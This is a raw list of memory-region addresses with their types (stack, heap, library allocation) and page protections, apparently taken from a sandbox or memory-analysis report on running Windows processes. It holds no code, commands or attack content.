stack
page read and write
197BCBE000
stack
page read and write
E0674CD000
stack
page read and write
7FF849220000
trusted library allocation
page read and write
205C7A52000
trusted library allocation
page read and write
1C30AA7A000
trusted library allocation
page read and write
2B03B085000
heap
page read and write
7FF849030000
trusted library allocation
page read and write
7FF848E1D000
trusted library allocation
page execute and read and write
7FF848EAC000
trusted library allocation
page execute and read and write
1D900BBA000
trusted library allocation
page read and write
20153FAA000
trusted library allocation
page read and write
205B59AA000
heap
page read and write
1C321C2C000
heap
page read and write
2015C330000
heap
page execute and read and write
7FF848E34000
trusted library allocation
page read and write
7FF849050000
trusted library allocation
page read and write
1784E135000
heap
page read and write
7FF849070000
trusted library allocation
page read and write
6C72ECB000
stack
page read and write
1D901737000
trusted library allocation
page read and write
7FF849230000
trusted library allocation
page read and write
72CAD7B000
stack
page read and write
7FF848FD0000
trusted library allocation
page execute and read and write
1784FED1000
trusted library allocation
page read and write
7FF848FD0000
trusted library allocation
page execute and read and write
1785002A000
trusted library allocation
page read and write
7FF849220000
trusted library allocation
page read and write
1C321BA6000
heap
page read and write
1D972B3B000
heap
page read and write
1D901B06000
trusted library allocation
page read and write
72CAA77000
stack
page read and write
1C30AAD8000
trusted library allocation
page read and write
2B020D20000
heap
page read and write
E065FDE000
stack
page read and write
1784DFD3000
heap
page read and write
205CFCC3000
heap
page read and write
1C321C06000
heap
page read and write
7FF848FE0000
trusted library allocation
page execute and read and write
205B59A6000
heap
page read and write
205B5C80000
heap
page read and write
72CA6FE000
stack
page read and write
1C3077A2000
heap
page read and write
1C3079D5000
heap
page read and write
2014223F000
heap
page read and write
197C78C000
stack
page read and write
2B024719000
trusted library allocation
page read and write
7FF849200000
trusted library allocation
page read and write
1C307910000
heap
page read and write
6C720F9000
stack
page read and write
2B024781000
trusted library allocation
page read and write
7FF849120000
trusted library allocation
page read and write
7FF849030000
trusted library allocation
page read and write
7FF8490B0000
trusted library allocation
page read and write
7FF849100000
trusted library allocation
page read and write
7FF849169000
trusted library allocation
page read and write
178682F0000
heap
page read and write
1D901856000
trusted library allocation
page read and write
1784FFD6000
trusted library allocation
page read and write
7FF848FF0000
trusted library allocation
page read and write
205B5940000
heap
page read and write
1C321BFD000
heap
page read and write
2015C5EF000
heap
page read and write
1D974AB4000
heap
page read and write
7FF849120000
trusted library allocation
page read and write
1C30A81D000
trusted library allocation
page read and write
2B022774000
heap
page read and write
2B020C44000
heap
page read and write
19D987E000
stack
page read and write
1C30AEBC000
trusted library allocation
page read and write
20153FB2000
trusted library allocation
page read and write
20145753000
trusted library allocation
page read and write
2015C97C000
heap
page read and write
2015C370000
heap
page execute and read and write
7FF8491A0000
trusted library allocation
page read and write
2B022760000
heap
page read and write
2B0238BA000
trusted library allocation
page read and write
1C30A63D000
trusted library allocation
page read and write
2B03A950000
heap
page read and write
1D97460B000
heap
page read and write
2B020E20000
heap
page read and write
2B022765000
heap
page read and write
7FF849020000
trusted library allocation
page read and write
1D972BB4000
heap
page read and write
7FF8491F0000
trusted library allocation
page read and write
CE12C8F000
stack
page read and write
2B0238D0000
trusted library allocation
page read and write
7FF849130000
trusted library allocation
page read and write
7FF8490C0000
trusted library allocation
page read and write
7FF848E10000
trusted library allocation
page read and write
7FF849130000
trusted library allocation
page read and write
205CFCBA000
heap
page read and write
7FF848FCA000
trusted library allocation
page read and write
7FF849164000
trusted library allocation
page read and write
197BAB8000
stack
page read and write
205B5910000
heap
page read and write
201455C3000
trusted library allocation
page read and write
7FF849290000
trusted library allocation
page read and write
2B03AFE7000
heap
page read and write
205B5C10000
trusted library allocation
page read and write
178680C7000
heap
page read and write
7FF848FC0000
trusted library allocation
page execute and read and write
2B020C25000
heap
page read and write
205B59F3000
heap
page read and write
1C30A9DD000
trusted library allocation
page read and write
1C32181A000
heap
page read and write
7DF48D830000
trusted library allocation
page execute and read and write
7FF849010000
trusted library allocation
page read and write
19D947E000
stack
page read and write
19D92FD000
stack
page read and write
7FF849060000
trusted library allocation
page read and write
7FF848FD0000
trusted library allocation
page execute and read and write
1784E165000
heap
page read and write
1D974586000
heap
page execute and read and write
1D974DCE000
heap
page read and write
7FF8490B0000
trusted library allocation
page read and write
7FF849200000
trusted library allocation
page read and write
CE120B9000
stack
page read and write
7FF8490B0000
trusted library allocation
page read and write
1D9019CC000
trusted library allocation
page read and write
7FF848E3C000
trusted library allocation
page execute and read and write
1C30AA14000
trusted library allocation
page read and write
6C721FA000
stack
page read and write
2B032C57000
trusted library allocation
page read and write
205B5CAC000
heap
page read and write
7FF848ED6000
trusted library allocation
page execute and read and write
1C309280000
trusted library allocation
page read and write
7FF8490A0000
trusted library allocation
page read and write
201453A4000
trusted library allocation
page read and write
2B022690000
trusted library allocation
page read and write
1D901705000
trusted library allocation
page read and write
2015C970000
heap
page read and write
1C30AA46000
trusted library allocation
page read and write
7FF849020000
trusted library allocation
page read and write
7FF8491B0000
trusted library allocation
page read and write
7FF8490D0000
trusted library allocation
page read and write
20142435000
heap
page read and write
72CAB7D000
stack
page read and write
201421B5000
heap
page read and write
201421C2000
heap
page read and write
1D974C62000
heap
page read and write
2B023B80000
trusted library allocation
page read and write
7FF8490D0000
trusted library allocation
page read and write
1784E167000
heap
page read and write
20143BF0000
trusted library allocation
page read and write
20143C6B000
heap
page read and write
1C321C54000
heap
page read and write
2B03AF43000
heap
page read and write
7DF4D0660000
trusted library allocation
page execute and read and write
2014512A000
trusted library allocation
page read and write
1784DFC3000
heap
page read and write
7FF8492A5000
trusted library allocation
page read and write
205B5C60000
heap
page execute and read and write
7FF849060000
trusted library allocation
page read and write
1D910001000
trusted library allocation
page read and write
72CAAF9000
stack
page read and write
1786839B000
heap
page read and write
205CFA28000
heap
page read and write
7FF849150000
trusted library allocation
page read and write
7FF849120000
trusted library allocation
page read and write
7FF8491E0000
trusted library allocation
page read and write
19D9577000
stack
page read and write
205B9423000
trusted library allocation
page read and write
2B03B006000
heap
page read and write
2B03AE0D000
heap
page read and write
7FF849160000
trusted library allocation
page read and write
E0666F9000
stack
page read and write
7FF848FF7000
trusted library allocation
page read and write
7FF849070000
trusted library allocation
page read and write
1D9100A9000
trusted library allocation
page read and write
20144BEA000
trusted library allocation
page read and write
1C30AA64000
trusted library allocation
page read and write
7FF849100000
trusted library allocation
page read and write
72CA393000
stack
page read and write
7FF849060000
trusted library allocation
page read and write
2B03AF27000
heap
page execute and read and write
7FF849000000
trusted library allocation
page read and write
1C321B7B000
heap
page read and write
7FF848FD2000
trusted library allocation
page read and write
20153F9A000
trusted library allocation
page read and write
205CFC08000
heap
page read and write
7FF848ECC000
trusted library allocation
page execute and read and write
2069D023000
heap
page read and write
7FF848EC6000
trusted library allocation
page read and write
1D972BB0000
heap
page read and write
7FF849050000
trusted library allocation
page read and write
7FF848FD0000
trusted library allocation
page execute and read and write
2069CF20000
heap
page read and write
1D974607000
heap
page read and write
2B03AE42000
heap
page read and write
6C72077000
stack
page read and write
2B03B51A000
heap
page read and write
1C30AE91000
trusted library allocation
page read and write
CE118F3000
stack
page read and write
2B0244F4000
trusted library allocation
page read and write
205B94AA000
trusted library allocation
page read and write
7FF8491B0000
trusted library allocation
page read and write
7FF8490F8000
trusted library allocation
page read and write
7FF848EF6000
trusted library allocation
page execute and read and write
CE122BB000
stack
page read and write
20144B63000
trusted library allocation
page read and write
2B020C2C000
heap
page read and write
7FF849152000
trusted library allocation
page read and write
19D977E000
stack
page read and write
7FF848DF2000
trusted library allocation
page read and write
1C30A665000
trusted library allocation
page read and write
1D9010B9000
trusted library allocation
page read and write
7FF849210000
trusted library allocation
page read and write
1C307764000
heap
page read and write
20142190000
heap
page read and write
2015CA07000
heap
page read and write
1D9016FC000
trusted library allocation
page read and write
1D901723000
trusted library allocation
page read and write
2015C5D1000
heap
page read and write
7FF849118000
trusted library allocation
page read and write
E0664FE000
stack
page read and write
7FF848FC1000
trusted library allocation
page read and write
2B023A67000
trusted library allocation
page read and write
7FF848E14000
trusted library allocation
page read and write
7FF848F30000
trusted library allocation
page execute and read and write
2B032951000
trusted library allocation
page read and write
2015C380000
heap
page read and write
7FF8490B0000
trusted library allocation
page read and write
7FF8490C0000
trusted library allocation
page read and write
205B5960000
heap
page read and write
20143C68000
heap
page read and write
6C71F79000
stack
page read and write
E0668FE000
stack
page read and write
7FF849010000
trusted library allocation
page read and write
2B0244B9000
trusted library allocation
page read and write
1C307990000
trusted library allocation
page read and write
178680A0000
heap
page read and write
1D9744A0000
trusted library allocation
page read and write
17850445000
trusted library allocation
page read and write
20153F40000
trusted library allocation
page read and write
2B02342F000
trusted library allocation
page read and write
1C30779E000
heap
page read and write
19D937E000
stack
page read and write
72CA97E000
stack
page read and write
7FF8490F0000
trusted library allocation
page read and write
2B023B92000
trusted library allocation
page read and write
197BBBE000
stack
page read and write
1D9751AE000
heap
page read and write
7FF848F92000
trusted library allocation
page read and write
7FF848FF4000
trusted library allocation
page read and write
1D900DE1000
trusted library allocation
page read and write
7FF849164000
trusted library allocation
page read and write
1C31953A000
trusted library allocation
page read and write
20142420000
trusted library allocation
page read and write
2B0226C0000
heap
page execute and read and write
7FF848E3B000
trusted library allocation
page execute and read and write
201421F8000
heap
page read and write
1C321EC4000
heap
page read and write
1C30AB4D000
trusted library allocation
page read and write
7FF849040000
trusted library allocation
page read and write
197B87A000
stack
page read and write
7FF849040000
trusted library allocation
page read and write
17868317000
heap
page read and write
2015C5E3000
heap
page read and write
1C307710000
heap
page read and write
7FF848FF7000
trusted library allocation
page read and write
2015C661000
heap
page read and write
2014583E000
trusted library allocation
page read and write
7FF849110000
trusted library allocation
page read and write
2B0229D5000
trusted library allocation
page read and write
7FF849272000
trusted library allocation
page read and write
6C71D7E000
stack
page read and write
1785097E000
trusted library allocation
page read and write
201459A8000
trusted library allocation
page read and write
2B0329C0000
trusted library allocation
page read and write
19D8FAF000
stack
page read and write
7FF848E2D000
trusted library allocation
page execute and read and write
2015C63E000
heap
page read and write
1D90106A000
trusted library allocation
page read and write
201440EB000
trusted library allocation
page read and write
2014556C000
trusted library allocation
page read and write
7FF849170000
trusted library allocation
page read and write
1D97513B000
heap
page read and write
6C719CF000
stack
page read and write
1C309FA8000
trusted library allocation
page read and write
2B03AF67000
heap
page read and write
2B02343F000
trusted library allocation
page read and write
7FF849030000
trusted library allocation
page read and write
7FF849270000
trusted library allocation
page read and write
7FF848E96000
trusted library allocation
page read and write
1C3218EA000
heap
page read and write
7FF848E00000
trusted library allocation
page read and write
2015C480000
trusted library allocation
page read and write
1D901468000
trusted library allocation
page read and write
7FF849240000
trusted library allocation
page execute and read and write
7FF849179000
trusted library allocation
page read and write
2B03AF88000
heap
page read and write
2B0243F1000
trusted library allocation
page read and write
205CFA20000
heap
page read and write
1C32185B000
heap
page read and write
2B02377F000
trusted library allocation
page read and write
20142430000
heap
page read and write
201451D4000
trusted library allocation
page read and write
1D901766000
trusted library allocation
page read and write
20145087000
trusted library allocation
page read and write
2015C3DF000
heap
page read and write
7FF849230000
trusted library allocation
page execute and read and write
1C309426000
trusted library allocation
page read and write
7FF848E1D000
trusted library allocation
page execute and read and write
1784FD50000
trusted library allocation
page read and write
197C889000
stack
page read and write
20143C96000
heap
page read and write
7FF8490F0000
trusted library allocation
page read and write
1D974D44000
heap
page read and write
CE119FE000
stack
page read and write
20143BE0000
heap
page readonly
205CF89B000
heap
page read and write
205B7DCE000
trusted library allocation
page read and write
205B5CA7000
heap
page read and write
2015C5F7000
heap
page read and write
1D974470000
trusted library allocation
page read and write
7FF849090000
trusted library allocation
page read and write
2B03B07F000
heap
page read and write
7FF848E1D000
trusted library allocation
page execute and read and write
1C3079D0000
heap
page read and write
2015C639000
heap
page read and write
7FF849220000
trusted library allocation
page read and write
1D972A90000
trusted library allocation
page read and write
7FF848E3D000
trusted library allocation
page execute and read and write
2015C6A3000
heap
page read and write
7DF4097E0000
trusted library allocation
page execute and read and write
1D974E30000
heap
page read and write
72CA67E000
unkown
page read and write
7FF84917A000
trusted library allocation
page read and write
205B59ED000
heap
page read and write
2B02379D000
trusted library allocation
page read and write
20142437000
heap
page read and write
1D975173000
heap
page read and write
2B020C20000
heap
page read and write
1784DF75000
heap
page read and write
2015C637000
heap
page read and write
1C3079D7000
heap
page read and write
7FF849170000
trusted library allocation
page read and write
1D90165F000
trusted library allocation
page read and write
2069CFE5000
heap
page read and write
1C30AE50000
trusted library allocation
page read and write
17850596000
trusted library allocation
page read and write
7FF848E9C000
trusted library allocation
page execute and read and write
1C3218AC000
heap
page read and write
1784DFBB000
heap
page read and write
F3E3D4B000
stack
page read and write
1D91009A000
trusted library allocation
page read and write
7FF848FF4000
trusted library allocation
page read and write
2015C984000
heap
page read and write
19D8F2E000
unkown
page read and write
2014591B000
trusted library allocation
page read and write
2B032C3F000
trusted library allocation
page read and write
1D972B00000
heap
page read and write
E0667FA000
stack
page read and write
1785001D000
trusted library allocation
page read and write
7FF848E0D000
trusted library allocation
page execute and read and write
1D90115C000
trusted library allocation
page read and write
1C30ABF5000
trusted library allocation
page read and write
7FF849144000
trusted library allocation
page read and write
7FF849120000
trusted library allocation
page read and write
2069CFE2000
heap
page read and write
7FF849220000
trusted library allocation
page read and write
2B023A46000
trusted library allocation
page read and write
7FF8491F0000
trusted library allocation
page read and write
7FF848F30000
trusted library allocation
page execute and read and write
2B020E80000
trusted library section
page read and write
1784FEFD000
trusted library allocation
page read and write
7FF848F80000
trusted library allocation
page read and write
7FF848E14000
trusted library allocation
page read and write
1C3219C0000
heap
page execute and read and write
7FF849280000
trusted library allocation
page read and write
2B024854000
trusted library allocation
page read and write
7FF848FF7000
trusted library allocation
page read and write
7FF848E30000
trusted library allocation
page read and write
7FF849188000
trusted library allocation
page read and write
2069D023000
heap
page read and write
1D9728D0000
heap
page read and write
72CB74E000
stack
page read and write
2015C376000
heap
page execute and read and write
1D9101E5000
trusted library allocation
page read and write
201423E0000
trusted library section
page read and write
1784E137000
heap
page read and write
20145558000
trusted library allocation
page read and write
1D972AF6000
heap
page read and write
7FF848EC6000
trusted library allocation
page read and write
7FF849090000
trusted library allocation
page read and write
2015C692000
heap
page read and write
2B03ADA0000
heap
page read and write
1D90128C000
trusted library allocation
page read and write
20144951000
trusted library allocation
page read and write
2B03B280000
heap
page read and write
E06687F000
stack
page read and write
7FF848DE0000
trusted library allocation
page read and write
197B7FE000
stack
page read and write
1C30AB1B000
trusted library allocation
page read and write
20145113000
trusted library allocation
page read and write
1D974C8A000
heap
page read and write
2014560D000
trusted library allocation
page read and write
7FF848FB0000
trusted library allocation
page read and write
2B03B122000
heap
page read and write
201459E2000
trusted library allocation
page read and write
1C30AE16000
trusted library allocation
page read and write
2069CFED000
heap
page read and write
1C30AECD000
trusted library allocation
page read and write
197BDBE000
stack
page read and write
1C30ABC1000
trusted library allocation
page read and write
1C3092F0000
heap
page read and write
7FF848E3D000
trusted library allocation
page execute and read and write
2B023B14000
trusted library allocation
page read and write
1D974DA0000
heap
page read and write
7FF849292000
trusted library allocation
page read and write
2069D019000
heap
page read and write
2B020C64000
heap
page read and write
2014579E000
trusted library allocation
page read and write
1D901B18000
trusted library allocation
page read and write
2B022770000
heap
page read and write
7FF8491D0000
trusted library allocation
page read and write
7FF848E13000
trusted library allocation
page execute and read and write
20143DA0000
trusted library allocation
page read and write
2015C66F000
heap
page read and write
7FF849123000
trusted library allocation
page read and write
7FF848E90000
trusted library allocation
page read and write
7FF849270000
trusted library allocation
page read and write
1C319518000
trusted library allocation
page read and write
7FF849050000
trusted library allocation
page read and write
7FF849110000
trusted library allocation
page read and write
7FF8491FC000
trusted library allocation
page read and write
1D972AB0000
heap
page read and write
7FF8490A0000
trusted library allocation
page read and write
2B020C90000
heap
page read and write
1C321B6F000
heap
page read and write
2B03ADC0000
heap
page read and write
7FF849130000
trusted library allocation
page read and write
1D91006F000
trusted library allocation
page read and write
1C309184000
heap
page read and write
7FF848EF6000
trusted library allocation
page execute and read and write
2015C978000
heap
page read and write
2B03B026000
heap
page read and write
7FF849000000
trusted library allocation
page execute and read and write
7FF849280000
trusted library allocation
page read and write
7FF848DF3000
trusted library allocation
page execute and read and write
1D901573000
trusted library allocation
page read and write
1784F910000
heap
page read and write
7FF849190000
trusted library allocation
page read and write
7FF849030000
trusted library allocation
page read and write
2015C4C9000
heap
page read and write
7FF8490E0000
trusted library allocation
page read and write
201423F0000
trusted library section
page read and write
1D974D8A000
heap
page read and write
2B022B77000
trusted library allocation
page read and write
201421FC000
heap
page read and write
1C3079C0000
heap
page read and write
1D974DD0000
trusted library allocation
page read and write
7FF848EF6000
trusted library allocation
page execute and read and write
7FF849210000
trusted library allocation
page execute and read and write
7FF849169000
trusted library allocation
page read and write
7FF848E00000
trusted library allocation
page read and write
6C71EFE000
stack
page read and write
1D972B13000
heap
page read and write
205CFA75000
heap
page read and write
2B023984000
trusted library allocation
page read and write
20145876000
trusted library allocation
page read and write
7FF848F00000
trusted library allocation
page execute and read and write
7FF849213000
trusted library allocation
page read and write
1C307715000
heap
page read and write
CE11EF6000
stack
page read and write
7FF848DF0000
trusted library allocation
page read and write
2B03B0D2000
heap
page read and write
7FF849240000
trusted library allocation
page read and write
1784E110000
trusted library allocation
page read and write
7FF849110000
trusted library allocation
page read and write
1C3219C7000
heap
page execute and read and write
7FF848E14000
trusted library allocation
page read and write
1C307950000
trusted library allocation
page read and write
17868346000
heap
page read and write
7FF849040000
trusted library allocation
page read and write
205B7476000
heap
page read and write
1D9729B0000
heap
page read and write
7FF848FF0000
trusted library allocation
page read and write
1C321AFA000
heap
page read and write
1D972A80000
heap
page readonly
7FF849230000
trusted library allocation
page read and write
7DF42E390000
trusted library allocation
page execute and read and write
1D901042000
trusted library allocation
page read and write
7FF848DE3000
trusted library allocation
page execute and read and write
7FF849280000
trusted library allocation
page read and write
1C321B89000
heap
page read and write
1D97461C000
heap
page read and write
205B5BC0000
heap
page read and write
7FF848EF6000
trusted library allocation
page execute and read and write
2B032981000
trusted library allocation
page read and write
7FF848E13000
trusted library allocation
page execute and read and write
1D901A60000
trusted library allocation
page read and write
20145A23000
trusted library allocation
page read and write
1D910011000
trusted library allocation
page read and write
2B020EE0000
heap
page read and write
7FF8491F0000
trusted library allocation
page read and write
E0669FF000
stack
page read and write
2B03B3E8000
heap
page read and write
1C30AA31000
trusted library allocation
page read and write
1D974C30000
heap
page read and write
7FF849020000
trusted library allocation
page read and write
1C31940F000
trusted library allocation
page read and write
7FF849110000
trusted library allocation
page read and write
1C3079C5000
heap
page read and write
2B03AF10000
trusted library allocation
page read and write
2B03B3D0000
heap
page read and write
17868090000
heap
page execute and read and write
178680B4000
heap
page read and write
7FF849070000
trusted library allocation
page read and write
7DF4D0650000
trusted library allocation
page execute and read and write
2B02434B000
trusted library allocation
page read and write
20145A4E000
trusted library allocation
page read and write
6C72178000
stack
page read and write
20143D70000
trusted library allocation
page read and write
2069CF00000
heap
page read and write
2014567F000
trusted library allocation
page read and write
1D974C00000
heap
page read and write
7FF848EA6000
trusted library allocation
page read and write
1D974D39000
heap
page read and write
2015C62F000
heap
page read and write
7FF8492A2000
trusted library allocation
page read and write
7FF848E0D000
trusted library allocation
page execute and read and write
20142200000
heap
page read and write
7FF8491A0000
trusted library allocation
page read and write
2015C760000
heap
page read and write
1784FFD9000
trusted library allocation
page read and write
1785FEC1000
trusted library allocation
page read and write
1D9019ED000
trusted library allocation
page read and write
E0662FD000
unkown
page read and write
205B7450000
heap
page read and write
1C30AAEC000
trusted library allocation
page read and write
1D974D22000
heap
page read and write
205B7891000
trusted library allocation
page read and write
6C71DFE000
stack
page read and write
20145118000
trusted library allocation
page read and write
205CFAD1000
heap
page read and write
2B03B112000
heap
page read and write
7FF8492A0000
trusted library allocation
page read and write
2B03ADD0000
heap
page read and write
7FF849040000
trusted library allocation
page read and write
7FF848FF4000
trusted library allocation
page read and write
1C30A446000
trusted library allocation
page read and write
7FF849140000
trusted library allocation
page read and write
7FF849250000
trusted library allocation
page read and write
2B03AE4A000
heap
page read and write
1C321BEA000
heap
page read and write
7FF848FCA000
trusted library allocation
page read and write
7FF849050000
trusted library allocation
page read and write
6C723FB000
stack
page read and write
205CFBD0000
heap
page read and write
7FF8491B0000
trusted library allocation
page read and write
1C309DC1000
trusted library allocation
page read and write
1D900001000
trusted library allocation
page read and write
7FF849170000
trusted library allocation
page read and write
7FF849250000
trusted library allocation
page read and write
1C30AD82000
trusted library allocation
page read and write
2B020C66000
heap
page read and write
7FF849010000
trusted library allocation
page read and write
7FF848E20000
trusted library allocation
page read and write
72CA8FF000
stack
page read and write
7FF848FF2000
trusted library allocation
page read and write
2B03B0BD000
heap
page read and write
7FF848E20000
trusted library allocation
page read and write
1D974BD0000
heap
page read and write
7FF848FB0000
trusted library allocation
page execute and read and write
2B02375F000
trusted library allocation
page read and write
1D972A10000
heap
page read and write
1D972AF8000
heap
page read and write
7FF848F91000
trusted library allocation
page read and write
1D9745D0000
heap
page read and write
19D95F8000
stack
page read and write
197B6FE000
stack
page read and write
7FF8490C0000
trusted library allocation
page read and write
17868390000
heap
page read and write
1D9016E5000
trusted library allocation
page read and write
197B67E000
stack
page read and write
7FF849080000
trusted library allocation
page read and write
7FF849143000
trusted library allocation
page read and write
7FF848DF4000
trusted library allocation
page read and write
1784DFFC000
heap
page read and write
197B3ED000
stack
page read and write
7FF849140000
trusted library allocation
page read and write
2015C988000
heap
page read and write
20143C00000
heap
page read and write
20153FD4000
trusted library allocation
page read and write
6C71CFE000
stack
page read and write
7FF849260000
trusted library allocation
page read and write
E0665FD000
stack
page read and write
1C30AABA000
trusted library allocation
page read and write
7FF849010000
trusted library allocation
page read and write
2B03AE4E000
heap
page read and write
17850187000
trusted library allocation
page read and write
7FF8490D0000
trusted library allocation
page read and write
20143C70000
heap
page read and write
7FF849170000
trusted library allocation
page read and write
1D975141000
heap
page read and write
7FF849090000
trusted library allocation
page read and write
6C7237E000
stack
page read and write
1C30ADA2000
trusted library allocation
page read and write
E0663FE000
stack
page read and write
7FF848E6C000
trusted library allocation
page execute and read and write
7FF849160000
trusted library allocation
page read and write
1D901840000
trusted library allocation
page read and write
1D975120000
heap
page read and write
1784DFC1000
heap
page read and write
20143DE5000
heap
page read and write
205B7B75000
trusted library allocation
page read and write
2B032971000
trusted library allocation
page read and write
1C321E99000
heap
page read and write
1784DFB5000
heap
page read and write
7FF8490A0000
trusted library allocation
page read and write
7FF848F30000
trusted library allocation
page execute and read and write
17868300000
heap
page read and write
1784E150000
heap
page readonly
17868327000
heap
page read and write
E06637E000
stack
page read and write
2B020E60000
heap
page read and write
1C319449000
trusted library allocation
page read and write
20145053000
trusted library allocation
page read and write
CE12E0A000
stack
page read and write
7FF8491D0000
trusted library allocation
page read and write
6C722FF000
stack
page read and write
2014556F000
trusted library allocation
page read and write
1D974D25000
heap
page read and write
205B87D2000
trusted library allocation
page read and write
7FF848EA0000
trusted library allocation
page read and write
7FF849180000
trusted library allocation
page read and write
1C3093A1000
trusted library allocation
page read and write
7FF849180000
trusted library allocation
page read and write
7FF849260000
trusted library allocation
page read and write
205B59C6000
heap
page read and write
2B032C47000
trusted library allocation
page read and write
1C30955A000
trusted library allocation
page read and write
1C321E80000
heap
page read and write
7FF8490E0000
trusted library allocation
page read and write
1784DFB3000
heap
page read and write
1D9001BA000
trusted library allocation
page read and write
201423C0000
heap
page read and write
1C3079CB000
heap
page read and write
2069D140000
heap
page read and write
1C321C6F000
heap
page read and write
1D974C2C000
heap
page read and write
2B02373D000
trusted library allocation
page read and write
20142400000
trusted library allocation
page read and write
7FF8490F0000
trusted library allocation
page read and write
1D9016C5000
trusted library allocation
page read and write
1C307940000
trusted library section
page read and write
20145914000
trusted library allocation
page read and write
1C30A5B7000
trusted library allocation
page read and write
7FF849080000
trusted library allocation
page read and write
7FF8491E0000
trusted library allocation
page read and write
7FF849210000
trusted library allocation
page read and write
197B8FD000
stack
page read and write
2B023812000
trusted library allocation
page read and write
2069CFE3000
heap
page read and write
7FF849143000
trusted library allocation
page read and write
2B0237E0000
trusted library allocation
page read and write
CE11D7E000
stack
page read and write
197BD3B000
stack
page read and write
7FF848FCA000
trusted library allocation
page read and write
2015C4B0000
heap
page read and write
7FF848DF0000
trusted library allocation
page read and write
197BC3E000
stack
page read and write
CE12038000
stack
page read and write
1C321970000
heap
page execute and read and write
7FF8490E0000
trusted library allocation
page read and write
72CAC7E000
stack
page read and write
1D974C24000
heap
page read and write
7FF8490F0000
trusted library allocation
page read and write
2B023B56000
trusted library allocation
page read and write
1C321EC8000
heap
page read and write
20142380000
heap
page read and write
72CABFE000
stack
page read and write
7FF849180000
trusted library allocation
page read and write
20153FC5000
trusted library allocation
page read and write
2B020ED0000
heap
page readonly
7FF848FB2000
trusted library allocation
page read and write
7FF848EC6000
trusted library allocation
page read and write
1D9745A0000
heap
page execute and read and write
6C7227E000
stack
page read and write
2B020CF0000
heap
page read and write
7FF848FF2000
trusted library allocation
page read and write
7FF849153000
trusted library allocation
page read and write
7FF849070000
trusted library allocation
page read and write
7FF848ECC000
trusted library allocation
page execute and read and write
2B0226D0000
trusted library allocation
page read and write
7FF849110000
trusted library allocation
page read and write
1784FF1D000
trusted library allocation
page read and write
7FF849010000
trusted library allocation
page read and write
2B0237B1000
trusted library allocation
page read and write
205B944F000
trusted library allocation
page read and write
1C321881000
heap
page read and write
7FF8492A7000
trusted library allocation
page read and write
201421F5000
heap
page read and write
2015C647000
heap
page read and write
7FF849020000
trusted library allocation
page read and write
1D90111B000
trusted library allocation
page read and write
E066778000
stack
page read and write
7FF848FA1000
trusted library allocation
page read and write
72CA9F9000
stack
page read and write
1784DE90000
heap
page read and write
1C30A210000
trusted library allocation
page read and write
2B03B0FE000
heap
page read and write
2B03AF20000
heap
page execute and read and write
1784F914000
heap
page read and write
1D974ADB000
heap
page read and write
1784E0D0000
heap
page read and write
1784E000000
heap
page read and write
7FF84921C000
trusted library allocation
page read and write
7FF849230000
trusted library allocation
page read and write
2B03AEF0000
heap
page execute and read and write
E06697C000
stack
page read and write
7FF849060000
trusted library allocation
page read and write
197B363000
stack
page read and write
205CFAC1000
heap
page read and write
20142202000
heap
page read and write
7FF848E12000
trusted library allocation
page read and write
7FF848FB2000
trusted library allocation
page read and write
7FF8490E0000
trusted library allocation
page read and write
7FF849240000
trusted library allocation
page read and write
7FF848EC0000
trusted library allocation
page read and write
2B020E00000
heap
page read and write
2B023A4D000
trusted library allocation
page read and write
2069D144000
heap
page read and write
1D974AD7000
heap
page read and write
197BB3B000
stack
page read and write
1C30A056000
trusted library allocation
page read and write
205B5984000
heap
page read and write
1D9751F1000
heap
page read and write
17868141000
heap
page read and write
2B03AF30000
heap
page read and write
7FF849020000
trusted library allocation
page read and write
2069CFE5000
heap
page read and write
1C307970000
trusted library allocation
page read and write
7FF84917C000
trusted library allocation
page read and write
7FF849040000
trusted library allocation
page read and write
7FF849150000
trusted library allocation
page read and write
7FF848E20000
trusted library allocation
page read and write
1D901A9B000
trusted library allocation
page read and write
1C307776000
heap
page read and write
1784E070000
heap
page read and write
205B7DD2000
trusted library allocation
page read and write
1D975122000
heap
page read and write
205B59B2000
heap
page read and write
7FF848F30000
trusted library allocation
page execute and read and write
1D972ABC000
heap
page read and write
7FF848E10000
trusted library allocation
page read and write
7FF848FC2000
trusted library allocation
page read and write
7FF848F10000
trusted library allocation
page execute and read and write
7FF848FE0000
trusted library allocation
page execute and read and write
1784F936000
heap
page read and write
1D910178000
trusted library allocation
page read and write
7FF8491C0000
trusted library allocation
page read and write
19D94F9000
stack
page read and write
2B023776000
trusted library allocation
page read and write
7FF848EC0000
trusted library allocation
page read and write
20144DA6000
trusted library allocation
page read and write
205B7C71000
trusted library allocation
page read and write
CE12D0C000
stack
page read and write
7FF8490D0000
trusted library allocation
page read and write
7FF849130000
trusted library allocation
page read and write
1784E160000
heap
page read and write
7FF849110000
trusted library allocation
page read and write
1C319420000
trusted library allocation
page read and write
7FF849180000
trusted library allocation
page read and write
7FF848FE0000
trusted library allocation
page read and write
2069D100000
heap
page read and write
1C319422000
trusted library allocation
page read and write
1D972CC5000
heap
page read and write
2B020EE7000
heap
page read and write
1D974D9A000
heap
page read and write
2B022951000
trusted library allocation
page read and write
7FF848E2B000
trusted library allocation
page read and write
7FF8490C0000
trusted library allocation
page read and write
7FF848E13000
trusted library allocation
page execute and read and write
7FF849000000
trusted library allocation
page execute and read and write
7FF848EC0000
trusted library allocation
page read and write
7FF848E10000
trusted library allocation
page read and write
1C30A645000
trusted library allocation
page read and write
1C319428000
trusted library allocation
page read and write
7FF849100000
trusted library allocation
page read and write
1C307762000
heap
page read and write
1D972BE9000
heap
page read and write
2015C6AC000
heap
page read and write
7FF849270000
trusted library allocation
page read and write
2015C974000
heap
page read and write
205CFC00000
heap
page read and write
1D910081000
trusted library allocation
page read and write
7FF849250000
trusted library allocation
page read and write
2B03B4C4000
heap
page read and write
2014564C000
trusted library allocation
page read and write
1C309FD2000
trusted library allocation
page read and write
7FF849060000
trusted library allocation
page read and write
2B022700000
trusted library allocation
page read and write
7FF8490C0000
trusted library allocation
page read and write
1C321A80000
heap
page read and write
CE1223E000
stack
page read and write
1C3219D0000
trusted library allocation
page read and write
1D901101000
trusted library allocation
page read and write
1785FF3B000
trusted library allocation
page read and write
1784DF70000
heap
page read and write
7FF8490B0000
trusted library allocation
page read and write
201455F6000
trusted library allocation
page read and write
CE11FB9000
stack
page read and write
7FF849174000
trusted library allocation
page read and write
201453AF000
trusted library allocation
page read and write
205B5B50000
heap
page read and write
7FF849030000
trusted library allocation
page read and write
17868096000
heap
page execute and read and write
205B5CA0000
heap
page read and write
17850368000
trusted library allocation
page read and write
7FF849200000
trusted library allocation
page read and write
2015C4DB000
heap
page read and write
1D9019D3000
trusted library allocation
page read and write
E06744E000
stack
